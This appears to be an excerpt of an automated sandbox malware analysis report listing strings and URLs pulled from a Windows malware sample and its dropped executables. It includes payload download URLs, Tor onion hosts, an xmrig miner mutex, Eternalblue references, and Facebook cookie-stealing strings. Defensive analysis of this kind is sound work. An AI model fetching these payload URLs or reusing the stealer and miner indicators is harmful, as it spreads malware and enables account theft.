            Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win10x64\x64\Release\SSDTHook.pdb source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: dbghelp.pdbGCTL source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmp
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exeCode function: 17_2_010A5969 FindFirstFileW,FindNextFileW,FindClose,17_2_010A5969
            Source: C:\Users\user\AppData\Local\Temp\b3cadvuqdqg\vkfgkd5pxm1.exeCode function: 17_2_01039290 FindFirstFileExW,17_2_01039290
            Source: C:\Users\user\AppData\Local\Temp\v01sxozeepn\installer.exeCode function: 18_2_0040AEF4 FindFirstFileW,FindClose,18_2_0040AEF4
            Source: C:\Users\user\AppData\Local\Temp\v01sxozeepn\installer.exeCode function: 18_2_0040A928 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,18_2_0040A928

            Networking:

            barindex
            Found Tor onion addressShow sources
            Source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmpString found in binary or memory: %safter top-level valuebad type in compare: block device requiredbufio: negative countcheckdead: runnable gcommand not supportedconcurrent map writescouldn't download WUPcouldn't elevate selfcouldn't extract depscouldn't get an eventcouldn't get app namecouldn't get usernamecouldn't hide servicecouldn't open logfilecouldn't open processcouldn't open servicecouldn't scan networkcouldn't set app namecouldn't set defendercouldn't set firewallcouldn't stop servicecouldn't write drivercouldn't write packetdecompression failuredefer on system stackelectrum-server.ninjaelectrum.hodlister.coelectrum.mindspot.orgelectrum.qtornado.comelectrum2.villocq.comembedded/Winmon32.sysembedded/Winmon64.sysexec: already startedfindrunnable: wrong pfortress.qtornado.comgot TI process handlehelicarrier.bauerj.euhttp: Handler timeouthttp: nil Request.URLhttps://sndvoices.comimage: unknown formatin string escape codeinvalid JPEG format: invalid named capturekey is not comparablelink has been severednet/http: nil Contextpackage not installedpanic on system stackprocess name is emptyread-only file systemreflect.Value.Complexreflect.Value.Pointerreflect.Value.SetUintreleasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustoo many coefficientstrace/breakpoint trapunknown address type unknown empty Contextunsupported extensionunsupported type (%T)user defined signal 1user defined signal 2 into Go struct field %SystemRoot%\system32\(?i)"?((?:.?)+\.exe)"?/lib/time/zoneinfo.zip3smoooajg7qqac2y.onion4656612873077392578125Aleutian Standard TimeAtlantic Standard TimeCaucasus Standard TimeConvertSidToStringSidWConvertStringSidToSidWCreateCompatibleBitmapCreateEnvironmentBlockCreateIoCompletionPortDEBUG_HTTP2_GOROUTINESDateline Standard TimeGeorgian Standard TimeGetEnvironmentStringsWGetTimeZoneInformationGlobal\xmrigMUTEX31337Hawaiian Standard TimeInscriptional_ParthianMAX_CONCURRENT_STREAMSMountain Standard TimeNtWaitForSingleObject
            Source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmpString found in binary or memory: Pakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSeImpersonatePrivilegeTasmania Standard TimeUnsupported Media TypeWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8YCbCrSubsampleRatio410YCbCrSubsampleRatio411YCbCrSubsampleRatio420YCbCrSubsampleRatio422YCbCrSubsampleRatio440YCbCrSubsampleRatio444\Eternalblue-2.2.0.exe\Eternalblue-2.2.0.xmladdress already in useadvapi32.dll not foundapplication/javascriptargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbauerjda5hnedjam.onionbauerjhejlv6di7s.onionbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memorycouldn't create devicecouldn't get file infocouldn't register testcouldn't select objectcouldn't start servicecoulnd't write to filediscover-blockchaincomdriver: bad connectionelectrum.leblancnet.uselectrum3.hodlister.coelectrum5.hodlister.coelectrumxhqdsmlu.onionerror decoding messageerror parsing regexp: excessive DC componentfailed to get UUID: %wfailed to open key: %wfailed to open src: %wfailed to set UUID: %wfreeIndex is not validgetenv before env initgzip: invalid checksumheader field %q = %q%shpack: string too longhsmiths4fyqlw5xw.onionhsmiths5mjk6uijs.onionhttp2: frame too largehttp://localhost:3433/icarus.tetradrachm.netidna: invalid label %qinappropriate fallbackinteger divide by zerointerface conversion: internal inconsistencyinvalid address familyinvalid number base %djson: unknown field %qkernel32.dll not foundmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressndndword5lpb7eex.onionnetwork is unreachablenon-Go function at pc=oldoverflow is not niloperation was canceledozahtqwp25chjdjd.onionprocess is created WUPprotocol not availableprotocol not supportedqtornadoklbgdyww.onionreflect.Value.MapIndexreflect.Value.SetFloatreflectlite.Value.Typeremote address changedruntime.main not on m0runtime: t.span= runtime: physPageSize=runtime: work.nwait = runtime:scanstack: gp=s.freeindex > s.nelemss7clinmo4cazmhul.onionscanstack - bad statussecure boot is enabledsend on closed channelserver.peers.subscribeservice does not existservice is not runningspan has no free spacestack not a power of 2timer goroutine (idle)trace reader (blocked)trace: alloc too largeunexpected length codeunexpected payload: %swirep: invalid p statewrite on closed bufferzero length BIT STRING into Go value of type %s/upload/%s/samples/%s) must be a power of 2
            Source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmpString found in binary or memory: %safter top-level valuebad type in compare: block device requiredbufio: negative countcheckdead: runnable gcommand not supportedconcurrent map writescouldn't download WUPcouldn't elevate selfcouldn't extract depscouldn't get an eventcouldn't get app namecouldn't get usernamecouldn't hide servicecouldn't open logfilecouldn't open processcouldn't open servicecouldn't scan networkcouldn't set app namecouldn't set defendercouldn't set firewallcouldn't stop servicecouldn't write drivercouldn't write packetdecompression failuredefer on system stackelectrum-server.ninjaelectrum.hodlister.coelectrum.mindspot.orgelectrum.qtornado.comelectrum2.villocq.comembedded/Winmon32.sysembedded/Winmon64.sysexec: already startedfindrunnable: wrong pfortress.qtornado.comgot TI process handlehelicarrier.bauerj.euhttp: Handler timeouthttp: nil Request.URLhttps://sndvoices.comimage: unknown formatin string escape codeinvalid JPEG format: invalid named capturekey is not comparablelink has been severednet/http: nil Contextpackage not installedpanic on system stackprocess name is emptyread-only file systemreflect.Value.Complexreflect.Value.Pointerreflect.Value.SetUintreleasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustoo many coefficientstrace/breakpoint trapunknown address type unknown empty Contextunsupported extensionunsupported type (%T)user defined signal 1user defined signal 2 into Go struct field %SystemRoot%\system32\(?i)"?((?:.?)+\.exe)"?/lib/time/zoneinfo.zip3smoooajg7qqac2y.onion4656612873077392578125Aleutian Standard TimeAtlantic Standard TimeCaucasus Standard TimeConvertSidToStringSidWConvertStringSidToSidWCreateCompatibleBitmapCreateEnvironmentBlockCreateIoCompletionPortDEBUG_HTTP2_GOROUTINESDateline Standard TimeGeorgian Standard TimeGetEnvironmentStringsWGetTimeZoneInformationGlobal\xmrigMUTEX31337Hawaiian Standard TimeInscriptional_ParthianMAX_CONCURRENT_STREAMSMountain Standard TimeNtWaitForSingleObjectPakistan Standard TimeParaguay Standard TimeRoGetActivationFactoryRtlGetNtVersionNumbersSafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSeImpersonatePrivilegeTasmania Standard TimeUnsupported Media TypeWaitForMultipleObjectsWget/1.12 (freebsd8.1)Xenu Link Sleuth/1.3.8YCbCrSubsampleRatio410YCbCrSubsampleRatio411YCbCrSubsampleRatio420YCbCrSubsampleRatio422YCbCrSubsampleRatio440YCbCrSubsampleRatio444\Eternalblue-2.2.0.exe\Eternalblue-2.2.0.xmladdress already in useadvapi32.dll not foundapplication/javascriptargument list too longassembly checks failedbad g->status in readybad sweepgen in refillbauerjda5hnedjam.onionbauerjhejlv6di7s.onionbitcoin3nqy3db7c.onionbody closed by handlercannot allocate memorycouldn't create devicecouldn't get file infocouldn't register testcouldn't select objectcouldn't start servicecoulnd't write to filediscover-blockchaincomdriver: bad con
            Source: Joe Sandbox ViewIP Address: 1.1.1.1 1.1.1.1
            Source: Joe Sandbox ViewIP Address: 5.101.110.225 5.101.110.225
            Source: Joe Sandbox ViewIP Address: 8.8.8.8 8.8.8.8
            Source: Joe Sandbox ViewIP Address: 8.8.8.8 8.8.8.8
            Source: vkfgkd5pxm1.exe, 00000011.00000000.725325187.00000000010C1000.00000008.00020000.sdmpString found in binary or memory: Unknown exceptionbad castbad locale name.facebook.comwww.facebook.comuri_token"admined_pages":{"nodes":[{"name""admined_pages":{"nodes":[{"id"business.facebook.comv7.0/act_ads/manager/account_settings/account_billinggraph.facebook.comfb_dtsg.+?value="([^"]+?)"fetchFbDtsg:pmid=1&__a=1&fb_dtsg=bluebar/modern_settings_menu/?help_type=364455653583099&show_contextual_help=1business_idrefreshasset_idbm_home_redirectcookiePath:Login DataloginDataPathx:.instagram.comcookie:cookieJson:cookiejson size is:coo is greater 0loginedhasno reachfetchFriendsNumfetchAllPaymentMethodsInfoisHasBmPagereachaccount id: equals www.facebook.com (Facebook)
            Source: tpwlxkeo40z.exe, 0000000F.00000000.724251441.00000000003A2000.00000002.00020000.sdmpString found in binary or memory: http://.css
            Source: tpwlxkeo40z.exe, tpwlxkeo40z.exe, 0000000F.00000000.724251441.00000000003A2000.00000002.00020000.sdmpString found in binary or memory: http://.jpg
            Source: multitimer.exe, 00000004.00000003.716904021.000000001BBAF000.00000004.00000001.sdmpString found in binary or memory: http://apps.ide7m
            Source: multitimer.exe, 00000002.00000002.668263089.0000000000B9D000.00000004.00000020.sdmp, multitimer.exe, 00000004.00000003.898077753.000000001D5E9000.00000004.00000001.sdmp, multitimer.exe, 0000000B.00000003.889954389.0000000000A88000.00000004.00000001.sdmpString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
            Source: multitimer.exe, 00000002.00000002.669880622.000000001B456000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertBaltimoreCA-2G2.crt0
            Source: SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe, 00000001.00000002.649731278.000000001BD50000.00000004.00000001.sdmp, multitimer.exe, 00000004.00000003.771606166.000000001D62A000.00000004.00000001.sdmp, 2mqvpn30gyk.exe, 0000000E.00000002.761859956.000000000264A000.00000004.00000001.sdmp, tpwlxkeo40z.exe, 0000000F.00000002.757258767.00000000029A2000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
            Source: SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe, 00000001.00000002.648414766.0000000000D3D000.00000004.00000020.sdmp, multitimer.exe, 00000004.00000003.780985692.000000001D686000.00000004.00000001.sdmp, 2mqvpn30gyk.exe, 0000000E.00000002.761859956.000000000264A000.00000004.00000001.sdmp, tpwlxkeo40z.exe, 0000000F.00000002.757258767.00000000029A2000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1.crt0
            Source: multitimer.exe, 00000002.00000002.668263089.0000000000B9D000.00000004.00000020.sdmp, multitimer.exe, 00000004.00000003.898077753.000000001D5E9000.00000004.00000001.sdmp, multitimer.exe, 0000000B.00000003.889954389.0000000000A88000.00000004.00000001.sdmpString found in binary or memory: http://cps.letsencrypt.org0
            Source: multitimer.exe, 00000002.00000002.668263089.0000000000B9D000.00000004.00000020.sdmp, multitimer.exe, 00000004.00000003.898077753.000000001D5E9000.00000004.00000001.sdmp, multitimer.exe, 0000000B.00000003.889954389.0000000000A88000.00000004.00000001.sdmpString found in binary or memory: http://cps.root-x1.letsencrypt.org0
            Source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmpString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
            Source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmpString found in binary or memory: http://crl.globalsign.net/Root.crl0
            Source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmpString found in binary or memory: http://crl.globalsign.net/primobject.crl0
            Source: multitimer.exe, 00000002.00000002.668263089.0000000000B9D000.00000004.00000020.sdmp, multitimer.exe, 00000004.00000003.898077753.000000001D5E9000.00000004.00000001.sdmp, multitimer.exe, 0000000B.00000003.889954389.0000000000A88000.00000004.00000001.sdmpString found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
            Source: multitimer.exe, 00000004.00000003.787655460.000000001D5D5000.00000004.00000001.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
            Source: multitimer.exe, 00000004.00000003.787655460.000000001D5D5000.00000004.00000001.sdmpString found in binary or memory: http://crl.rootg2.amazontrust.com/rootg2.crl0
            Source: multitimer.exe, 00000002.00000002.669880622.000000001B456000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertBaltimoreCA-2G2.crl0:
            Source: SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe, 00000001.00000002.649731278.000000001BD50000.00000004.00000001.sdmp, multitimer.exe, 00000004.00000003.771606166.000000001D62A000.00000004.00000001.sdmp, 2mqvpn30gyk.exe, 0000000E.00000002.761859956.000000000264A000.00000004.00000001.sdmp, tpwlxkeo40z.exe, 0000000F.00000002.757258767.00000000029A2000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
            Source: SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe, 00000001.00000002.648414766.0000000000D3D000.00000004.00000020.sdmp, multitimer.exe, 00000004.00000003.780985692.000000001D686000.00000004.00000001.sdmp, 2mqvpn30gyk.exe, 0000000E.00000002.761859956.000000000264A000.00000004.00000001.sdmp, tpwlxkeo40z.exe, 0000000F.00000002.757258767.00000000029A2000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1.crl0
            Source: multitimer.exe, 00000002.00000002.669880622.000000001B456000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
            Source: multitimer.exe, 00000002.00000002.669880622.000000001B456000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertBaltimoreCA-2G2.crl0L
            Source: SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe, 00000001.00000002.649731278.000000001BD50000.00000004.00000001.sdmp, multitimer.exe, 00000004.00000003.771606166.000000001D62A000.00000004.00000001.sdmp, 2mqvpn30gyk.exe, 0000000E.00000002.761859956.000000000264A000.00000004.00000001.sdmp, tpwlxkeo40z.exe, 0000000F.00000002.757258767.00000000029A2000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
            Source: SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe, 00000001.00000002.648414766.0000000000D3D000.00000004.00000020.sdmp, multitimer.exe, 00000004.00000003.780985692.000000001D686000.00000004.00000001.sdmp, 2mqvpn30gyk.exe, 0000000E.00000002.761859956.000000000264A000.00000004.00000001.sdmp, tpwlxkeo40z.exe, 0000000F.00000002.757258767.00000000029A2000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1.crl0L
            Source: multitimer.exe, 00000004.00000003.787655460.000000001D5D5000.00000004.00000001.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
            Source: multitimer.exe, 00000004.00000003.787655460.000000001D5D5000.00000004.00000001.sdmpString found in binary or memory: http://crt.rootg2.amazontrust.com/rootg2.cer0=
            Source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmpString found in binary or memory: http://devlog.gregarius.net/docs/ua)Links
            Source: SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe, 00000001.00000002.648727903.0000000002C6B000.00000004.00000001.sdmp, 2mqvpn30gyk.exe, 0000000E.00000002.761859956.000000000264A000.00000004.00000001.sdmpString found in binary or memory: http://digitalassets.ams3.digitaloceanspaces.com
            Source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmpString found in binary or memory: http://duckduckgo.com/?q=http://www.google.com/?q=iTunes/9.0.2
            Source: AwesomePoolE1.exe, 00000010.00000003.745346182.000000001CFFB000.00000004.00000001.sdmpString found in binary or memory: http://en.w
            Source: tpwlxkeo40z.exe, tpwlxkeo40z.exe, 0000000F.00000000.724251441.00000000003A2000.00000002.00020000.sdmpString found in binary or memory: http://html4/loose.dtd
            Source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmpString found in binary or memory: http://https://_bad_pdb_file.pdb
            Source: multitimer.exe, 00000008.00000002.802510935.000000001BD90000.00000004.00000001.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
            Source: multitimer.exe, 00000004.00000003.838097111.000000000395A000.00000004.00000001.sdmpString found in binary or memory: http://kwq950.online
            Source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmpString found in binary or memory: http://localhost:3433/icarus.tetradrachm.netidna:
            Source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmpString found in binary or memory: http://newscommer.com/app/app.exe
            Source: multitimer.exe, 00000004.00000003.794172433.00000000039CA000.00000004.00000001.sdmpString found in binary or memory: http://nvidsame.com/app/app.exe
            Source: multitimer.exe, 00000004.00000003.787655460.000000001D5D5000.00000004.00000001.sdmpString found in binary or memory: http://o.ss2.us/0
            Source: tpwlxkeo40z.exe, 0000000F.00000002.755015942.0000000000A0D000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.di
            Source: SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe, 00000001.00000002.649731278.000000001BD50000.00000004.00000001.sdmp, multitimer.exe, 00000004.00000003.771606166.000000001D62A000.00000004.00000001.sdmp, 2mqvpn30gyk.exe, 0000000E.00000002.761859956.000000000264A000.00000004.00000001.sdmp, tpwlxkeo40z.exe, 0000000F.00000002.757258767.00000000029A2000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: multitimer.exe, 00000002.00000002.669880622.000000001B456000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
            Source: multitimer.exe, 00000002.00000002.669880622.000000001B456000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0C
            Source: SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe, 00000001.00000002.648414766.0000000000D3D000.00000004.00000020.sdmp, multitimer.exe, 00000004.00000003.780985692.000000001D686000.00000004.00000001.sdmp, 2mqvpn30gyk.exe, 0000000E.00000002.761859956.000000000264A000.00000004.00000001.sdmp, tpwlxkeo40z.exe, 0000000F.00000002.757258767.00000000029A2000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0G
            Source: multitimer.exe, 00000004.00000003.787655460.000000001D5D5000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
            Source: multitimer.exe, 00000004.00000003.787655460.000000001D5D5000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.rootg2.amazontrust.com08
            Source: multitimer.exe, 00000002.00000002.668263089.0000000000B9D000.00000004.00000020.sdmp, multitimer.exe, 00000004.00000003.694786238.0000000001053000.00000004.00000001.sdmp, multitimer.exe, 0000000B.00000003.889954389.0000000000A88000.00000004.00000001.sdmpString found in binary or memory: http://r3.i.lencr.org/0
            Source: multitimer.exe, 00000004.00000003.898077753.000000001D5E9000.00000004.00000001.sdmpString found in binary or memory: http://r3.i.lencr.org/0/
            Source: multitimer.exe, 00000002.00000002.668263089.0000000000B9D000.00000004.00000020.sdmp, multitimer.exe, 00000004.00000003.898077753.000000001D5E9000.00000004.00000001.sdmp, multitimer.exe, 0000000B.00000003.889954389.0000000000A88000.00000004.00000001.sdmpString found in binary or memory: http://r3.o.lencr.org0
            Source: multitimer.exe, 00000004.00000003.787655460.000000001D5D5000.00000004.00000001.sdmpString found in binary or memory: http://s.ss2.us/r.crl0
            Source: multitimer.exe, 00000004.00000003.900437129.000000001BBF9000.00000004.00000001.sdmpString found in binary or memory: http://s.symcb.com/pca3-
            Source: SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe, 00000001.00000002.648662757.0000000002BD1000.00000004.00000001.sdmp, 2mqvpn30gyk.exe, 0000000E.00000002.758551056.0000000002632000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmpString found in binary or memory: http://search.msn.com/msnbot.htm)msnbot/1.1
            Source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmpString found in binary or memory: http://search.msn.com/msnbot.htm)multipart/form-data
            Source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmpString found in binary or memory: http://www.avantbrowser.com)MOT-V9mm/00.62
            Source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmpString found in binary or memory: http://www.baidu.com/search/spider.htm)MobileSafari/600.1.4
            Source: AwesomePoolE1.exe, 00000010.00000003.770340667.000000001D006000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: AwesomePoolE1.exe, 00000010.00000003.770158331.000000001D014000.00000004.00000001.sdmp, AwesomePoolE1.exe, 00000010.00000003.766514791.000000001D00D000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: AwesomePoolE1.exe, 00000010.00000003.766400864.000000001D00D000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/
            Source: AwesomePoolE1.exe, 00000010.00000003.767975089.000000001D006000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comh%
            Source: AwesomePoolE1.exe, 00000010.00000003.756257315.000000001D006000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: AwesomePoolE1.exe, 00000010.00000003.756257315.000000001D006000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnnoig
            Source: AwesomePoolE1.exe, 00000010.00000003.756257315.000000001D006000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnu
            Source: AwesomePoolE1.exe, 00000010.00000003.756257315.000000001D006000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnya
            Source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmpString found in binary or memory: http://www.google.ru/?hl=ru&q=illegal
            Source: installer.exe, 00000012.00000003.753049587.000000007FC30000.00000004.00000001.sdmpString found in binary or memory: http://www.innosetup.com/
            Source: AwesomePoolE1.exe, 00000010.00000003.761458989.000000001D006000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: AwesomePoolE1.exe, 00000010.00000003.761458989.000000001D006000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/F
            Source: AwesomePoolE1.exe, 00000010.00000003.760937918.000000001D006000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/G.F
            Source: AwesomePoolE1.exe, 00000010.00000003.761458989.000000001D006000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0TTF
            Source: AwesomePoolE1.exe, 00000010.00000003.761458989.000000001D006000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp
            Source: AwesomePoolE1.exe, 00000010.00000003.761458989.000000001D006000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/H
            Source: multitimer.exe, 0000000B.00000003.889954389.0000000000A88000.00000004.00000001.sdmpString found in binary or memory: http://www.onclickmax.com/script/preurl.php?r=1590229&sub1=9
            Source: installer.exe, 00000012.00000003.753049587.000000007FC30000.00000004.00000001.sdmpString found in binary or memory: http://www.remobjects.com/ps
            Source: AwesomePoolE1.exe, 00000010.00000003.748742620.000000001D007000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: AwesomePoolE1.exe, 00000010.00000003.748742620.000000001D007000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.coma-d
            Source: AwesomePoolE1.exe, 00000010.00000003.748742620.000000001D007000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.como
            Source: AwesomePoolE1.exe, 00000010.00000003.748742620.000000001D007000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.comrsivoi
            Source: AwesomePoolE1.exe, 00000010.00000003.762372067.000000001D03D000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
            Source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmpString found in binary or memory: http://www.search.com/web?q=invalid
            Source: installer.exe, 00000012.00000003.802572245.0000000002381000.00000004.00000001.sdmpString found in binary or memory: http://www.trustedlogos.com/
            Source: installer.exe, 00000012.00000003.731180992.00000000024C0000.00000004.00000001.sdmpString found in binary or memory: http://www.trustedlogos.com/8http://www.trustedlogos.com/8http://www.trustedlogos.com/
            Source: installer.exe, 00000012.00000003.802572245.0000000002381000.00000004.00000001.sdmpString found in binary or memory: http://www.trustedlogos.com/A
            Source: multitimer.exe, 00000004.00000003.787655460.000000001D5D5000.00000004.00000001.sdmpString found in binary or memory: http://x.ss2.us/x.cer0&
            Source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmpString found in binary or memory: https://2makestorage.comidna:
            Source: installer.exe, 00000012.00000003.731180992.00000000024C0000.00000004.00000001.sdmpString found in binary or memory: https://api.googlrapis.com/installer/
            Source: AwesomePoolE1.exe, 00000010.00000000.723831514.0000000000652000.00000002.00020000.sdmpString found in binary or memory: https://awesomepools.space/fees.php#pictureBox1.Image
            Source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmpString found in binary or memory: https://blockchain.infoindex
            Source: SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe, 00000001.00000002.648662757.0000000002BD1000.00000004.00000001.sdmp, 2mqvpn30gyk.exe, 0000000E.00000002.758551056.0000000002632000.00000004.00000001.sdmp, tpwlxkeo40z.exe, 0000000F.00000002.757258767.00000000029A2000.00000004.00000001.sdmpString found in binary or memory: https://digitalassets.ams3.digitaloceanspaces.com
            Source: tpwlxkeo40z.exe, 0000000F.00000002.757060720.0000000002901000.00000004.00000001.sdmpString found in binary or memory: https://digitalassets.ams3.digitaloceanspaces.com/cstadmo/setups.exe
            Source: 2mqvpn30gyk.exe, 0000000E.00000002.753969283.00000000025F1000.00000004.00000001.sdmp, 2mqvpn30gyk.exe, 0000000E.00000002.820645486.00000000127E2000.00000004.00000001.sdmpString found in binary or memory: https://digitalassets.ams3.digitaloceanspaces.com/cstadmo/tsac/Caster.exe
            Source: 2mqvpn30gyk.exe, 0000000E.00000002.742226663.0000000000967000.00000004.00000020.sdmpString found in binary or memory: https://digitalassets.ams3.digitaloceanspaces.com/cstadmo/tsac/Caster.exeL
            Source: 2mqvpn30gyk.exe, 0000000E.00000002.753969283.00000000025F1000.00000004.00000001.sdmp, 2mqvpn30gyk.exe, 0000000E.00000002.820645486.00000000127E2000.00000004.00000001.sdmpString found in binary or memory: https://digitalassets.ams3.digitaloceanspaces.com/cstadmo/tsac/CasterUninstaller.exe
            Source: SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe, 00000001.00000002.648662757.0000000002BD1000.00000004.00000001.sdmpString found in binary or memory: https://digitalassets.ams3.digitaloceanspaces.com/hahaza/Visual19.exe
            Source: SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe, 00000001.00000002.648757628.0000000002CA3000.00000004.00000001.sdmpString found in binary or memory: https://digitalassets.ams3.digitaloceanspaces.com/hahaza/Visual19.exe.config
            Source: SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe, 00000001.00000002.648757628.0000000002CA3000.00000004.00000001.sdmpString found in binary or memory: https://digitalassets.ams3.digitaloceanspaces.com/hahaza/Visual19.exe.config0y
            Source: SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe, 00000001.00000002.648662757.0000000002BD1000.00000004.00000001.sdmpString found in binary or memory: https://digitalassets.ams3.digitaloceanspaces.com/hahaza/Visual19.exe0y
            Source: SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe, 00000001.00000002.648757628.0000000002CA3000.00000004.00000001.sdmp, 2mqvpn30gyk.exe, 0000000E.00000002.765258818.0000000002682000.00000004.00000001.sdmpString found in binary or memory: https://digitalassets.ams3.digitaloceanspaces.com8
            Source: SecuriteInfo.com.Generic.mg.cf35edde149e46ee.exe, 00000001.00000002.648721404.0000000002C60000.00000004.00000001.sdmp, 2mqvpn30gyk.exe, 0000000E.00000002.760206850.000000000263F000.00000004.00000001.sdmpString found in binary or memory: https://digitalassets.ams3.digitaloceanspaces.comx
            Source: app.exe, 00000013.00000002.838647912.0000000000400000.00000040.00020000.sdmpString found in binary or memory: https://fotamene.cominvalid
            Source: installer.exeString found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdline
            Source: installer.exe, 00000012.00000002.804792262.0000000000401000.00000020.00020000.sdmpString found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
            Source: multitimer.exe, 00000002.00000002.669240459.0000000002B9E000.00000004.00000001.sdmpString found in binary or memory: https://new.multitimer.fun
